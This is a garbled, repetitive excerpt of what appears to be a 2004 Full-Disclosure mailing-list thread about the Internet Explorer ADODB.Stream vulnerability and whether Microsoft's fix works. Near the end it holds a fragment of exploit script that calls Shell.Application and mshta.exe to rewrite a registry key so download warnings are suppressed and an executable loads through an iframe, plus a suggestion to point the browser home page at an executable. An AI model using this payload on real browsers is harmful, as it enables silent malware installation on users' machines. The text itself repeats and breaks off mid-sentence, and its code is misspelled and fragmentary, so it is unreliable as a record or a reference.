Matthew Murphy wrote:
snip
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The problem is
that code loaded from the Internet zone is just not supposed to be
allowed to get access to
] Fix for IE
ADODB.Stream vulnerability
is out
what you should be getting (assuming the patch does
work) is something like
the
following:
line: 3
char: 3
Error: Access is denied
Code: 0
etc...
dunno why it doesn't work on some systems though.
Met vriendelijke groet,
Pascal
what you should be getting (assuming the patch does work) is something like the
following:
line: 3
char: 3
Error: Access is denied
Code: 0
etc...
dunno why it doesn't work on some systems though.
Met vriendelijke groet,
Pascal Zoutendijk
TBWA \ ICT Services
Prof W.H. Keesomlaan 8
1183 DJ
Microsoft's announcement ?
-Original Message-
From: Pascal Zoutendijk [mailto:[EMAIL PROTECTED]
Sent: vrijdag 2 juli 2004 23:28
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability
Jelmer writes:
Because we avoid the adodb.stream issue all together,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them
!--
The real fault doesn't belong with individual components
(ADODB.Stream included), and I think the almost rant-like posts
of Drew Copeley and HTTP-EQUIV miss this fact. ADODB.Stream
does *not* represent a vulnerability, although it does act to
significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It's
still have to contend with mshta.exe calling out through the
iframe and more than likely firewalled long ago, so use it to
write the registry to kill the download warning, then use it set
the browser home page as http://www/foo.exe, that or the
default search engine.
tons of